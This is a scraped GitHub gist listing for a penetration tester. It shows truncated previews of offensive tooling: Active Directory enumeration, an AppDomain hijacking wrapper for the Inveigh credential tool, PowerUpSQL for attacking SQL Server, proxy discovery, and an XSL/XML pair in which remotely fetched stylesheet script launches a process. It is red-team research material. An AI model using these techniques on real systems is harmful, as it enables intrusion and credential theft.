Skip to content

Instantly share code, notes, and snippets.

Avatar

Scott Sutherland nullbind

View GitHub Profile
View Get-DomainInfoADPS.psm1
This file has been truncated, but you can view the full file.
# -------------------------------------------
# Function: Get-DomainInfoADPS
# Author: Scott Sutherland (@_nullbind), NetSPI
# Version: 1.7
# This script can be used to dump interesting
# information from Active Directory.
# This function requires the Active Directory
# PowerShell Module, but the script supports
View gist:32f6ce79c7049c3b7d33a9ed0f371227
Source: MSCBBLD4459.iccu.com
IP Address: 10.9.14.65
Date/time: 04/09/2020
Logging/Data Source: Process creation events were logged by Carbon Black and native Windows logging to event 4688 locally. Windows events are logged to the local machine, but the current WEF subscription does not include event 4688 because its too noisy. However, Carbon black is capturing the events. PowerShell script block logging is also enabled and generates 4014 events.
Data Source:
Log Level: None.
Detection: None.
Blocking: None.
Alerting: None.
@nullbind
nullbind / AppDomain-Hijack-Inveigh.cs
Created Dec 15, 2020
AppDomain-Hijack-Inveigh.cs
View AppDomain-Hijack-Inveigh.cs
/*
AppDomain Hijacking Execution Method
Payload: Inveight Wrapper
Description: This can be used to run Inveigh through appdomain hijacking.
Mitre ATT&CK ID: T1038
Author: Kevin Robertson - Inveigh, Scott Sutherland - Wrapper
Credits: Based on techniques by Casey Smith.
Execution Option: Config File
View MiniPowerUpSQL.psm1
function Get-DomainObject
{
[CmdletBinding()]
Param(
[Parameter(Mandatory = $false,
HelpMessage = 'Domain user to authenticate with domain\user.')]
[string]$Username,
[Parameter(Mandatory = $false,
HelpMessage = 'Domain password to authenticate with domain\user.')]
@nullbind
nullbind / Get-SmbShareInventory.psm1
Last active Aug 20, 2020
Get-SmbShareInventory.ps1
View Get-SmbShareInventory.psm1
#--------------------------------------
# Function: Get-SMBShareInventory
#--------------------------------------
# Author: Scott Sutherland, 2020 NetSPI
# References: This script includes code taken and modified from the open source projects PowerView, Invoke-Ping, and Invoke-Parrell.
function Get-SMBShareInventory
{
<#
.SYNOPSIS
@nullbind
nullbind / Get-WinProxyInfo.ps1
Last active May 4, 2021
Get-WinProxyInfo.ps1
View Get-WinProxyInfo.ps1
# Work in progress
# Automation goals
# 1 enumeration HTTP proxy configurations on Windows and AD domain joined systems
# 2 parse the proxies
# 3 test for unauthenticated outbound internet access.
# 4 produce inventory of available proxies and if auth is requires (proxy_url, proxy_port, proxy_source, authentication_required)
# ----------------------------------
# Get-HttpProxyInfo
# ----------------------------------
@nullbind
nullbind / PowerUpSQL-Dc-Without-Creds.ps1
Created Jun 30, 2020
PowerUpSQL-Dc-Without-Creds.ps1
View PowerUpSQL-Dc-Without-Creds.ps1
This file has been truncated, but you can view the full file.
#requires -version 2
<#
File: PowerUpSQL.ps1
Author: Scott Sutherland (@_nullbind), NetSPI - 2020
Major Contributors: Antti Rantasaari and Eric Gruber
Version: 1.106
Description: PowerUpSQL is a PowerShell toolkit for attacking SQL Server.
License: BSD 3-Clause
Required Dependencies: PowerShell v.2
View Send-ProtocolHandlerEmailLinks.psm1
View xsl-notepad.xsl
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
return nodelist.nextNode().xml;
View xsl-notepad.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>